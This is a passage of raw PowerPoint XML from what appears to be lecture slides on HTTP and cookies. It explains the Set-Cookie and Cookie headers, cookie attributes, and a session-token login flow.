        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP 0.9/1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP 1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1986124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1A03-121F-4B05-8112-A19D3893FB2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BB99D47-E669-469C-B7DE-454A7A04341D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduced in 1994, cookies are a basic mechanism for persistent state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows services to store a small amount of data at the client (usually ~4K)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often used for identification, authentication, user tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manipulated by two HTTP headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In responses, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set-Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>stores a cookie in the web browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In requests, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sends previously set cookies back to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All cookies have attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain and path where the cookie was originally set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expiration sets how long cookie is valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional security restrictions (added much later): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256475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on Today’s Internet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most flows use Hypertext Transfer Protocol (HTTP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web is at least 52% of traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Median object size is 2.7K, average is 85K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP is used in many contexts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The web browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apps that access a back-end web service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS queries (DNS over HTTP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DoH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File transfers (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Bittorrent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP is vulnerable to a variety of security attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Because HTTP is used everywhere, vulnerabilities are everywhere</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399090273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E72BC1F-32BB-FA30-0EA8-418CBA2FB532}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651816" y="2471394"/>
            <a:ext cx="2596901" cy="35926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6EB7410-52F9-7898-1CF9-822D067337F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257431" y="3483575"/>
            <a:ext cx="1313180" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0"/>
              <a:t>Cookie Jar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DA9D638-6ED4-5EF6-2F3D-27D64EDC6F73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="651816" y="3974347"/>
            <a:ext cx="2524409" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>session=FhizeVYSkS7X2K</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="228600"/>
            <a:ext cx="11785600" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie Example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3170" y="2275749"/>
            <a:ext cx="893446" cy="893446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="1514143"/>
            <a:ext cx="3249370"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64" y="2236697"/>
            <a:ext cx="971550" cy="971550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8124967" y="1514935"/>
            <a:ext cx="3769853"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3919579" y="2016821"/>
            <a:ext cx="3859415" cy="378074"/>
            <a:chOff x="4401624" y="3387776"/>
            <a:chExt cx="3859415" cy="378074"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Straight Arrow Connector 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4401624" y="3748365"/>
              <a:ext cx="3859415" cy="17485"/>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81724" y="3387776"/>
              <a:ext cx="3200428" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>GET /login_form.html HTTP/1.1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3919579" y="2503294"/>
            <a:ext cx="3859415" cy="386817"/>
            <a:chOff x="4370185" y="3387776"/>
            <a:chExt cx="3859415" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4370185" y="3774593"/>
              <a:ext cx="3859415"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3919579" y="3176572"/>
            <a:ext cx="3859415" cy="378074"/>
            <a:chOff x="4401624" y="3387776"/>
            <a:chExt cx="3859415" cy="378074"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="27" name="Straight Arrow Connector 26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4401624" y="3748365"/>
              <a:ext cx="3859415" cy="17485"/>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945584" y="3387776"/>
              <a:ext cx="2872711" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>POST /cgi/login.sh HTTP/1.1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3919579" y="3700096"/>
            <a:ext cx="3859415" cy="709300"/>
            <a:chOff x="4370185" y="3387776"/>
            <a:chExt cx="3859415" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="30" name="Straight Arrow Connector 29"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4370185" y="3774593"/>
              <a:ext cx="3859415"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36569" y="3387776"/>
              <a:ext cx="3690754" cy="352477"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>HTTP/1.1 302 Found</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Set-Cookie: session=FhizeVYSkS7X2K</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Group 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3919579" y="6020986"/>
            <a:ext cx="3857139" cy="646332"/>
            <a:chOff x="4401624" y="3469443"/>
            <a:chExt cx="3857139" cy="279226"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Straight Arrow Connector 32"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4401624" y="3748365"/>
              <a:ext cx="3857139" cy="304"/>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610783" y="3469443"/>
              <a:ext cx="3542316" cy="279226"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>GET /my_files.html HTTP/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Cookie: session=FhizeVYSkS7X2K;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{835B6BEB-5BD0-4093-9839-1A61DEF05D66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3919579" y="5433289"/>
            <a:ext cx="3859415" cy="386817"/>
            <a:chOff x="4370185" y="3387776"/>
            <a:chExt cx="3859415" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="24" name="Straight Arrow Connector 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A88B3F5-9C3B-4540-B8FB-291C98C62367}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4370185" y="3774593"/>
              <a:ext cx="3859415"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5959F42-1FB7-4A4D-AEF8-4A1725C686E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65CCDCED-EEA0-4ADB-AC1E-FF2F7AEF3810}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3919579" y="4645868"/>
            <a:ext cx="3857139" cy="646332"/>
            <a:chOff x="4401624" y="3469443"/>
            <a:chExt cx="3857139" cy="279226"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36" name="Straight Arrow Connector 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4AE87FB-6664-4C64-A51D-4F9556C8781F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4401624" y="3748365"/>
              <a:ext cx="3857139" cy="304"/>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AACB08A-ACFB-42C6-BDD5-18B11EA6645B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4691254" y="3469443"/>
              <a:ext cx="3381374" cy="279226"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>GET /private_data.html HTTP/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Cookie: session=FhizeVYSkS7X2K;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Speech Bubble: Rectangle 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{963B6A5F-309B-4C86-BB14-671F240FCCBC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8609619" y="3361238"/>
            <a:ext cx="3236638" cy="1333588"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -74588"/>
              <a:gd name="adj2" fmla="val -1942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If credentials are correct:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Generate a random token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store token in the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send token to the client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Speech Bubble: Rectangle 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9497A3-E84E-466E-B4D4-AD4A88ED23D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8261445" y="5019899"/>
            <a:ext cx="3584812" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -68624"/>
              <a:gd name="adj2" fmla="val -3801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buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check token in the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If it exists, user is authenticated </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301839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right)">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26"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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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right)">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="48"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8" grpId="0" animBg="1"/>
      <p:bldP spid="3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Hypertext Transfer Protocol (HTTP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828801" y="2743200"/>
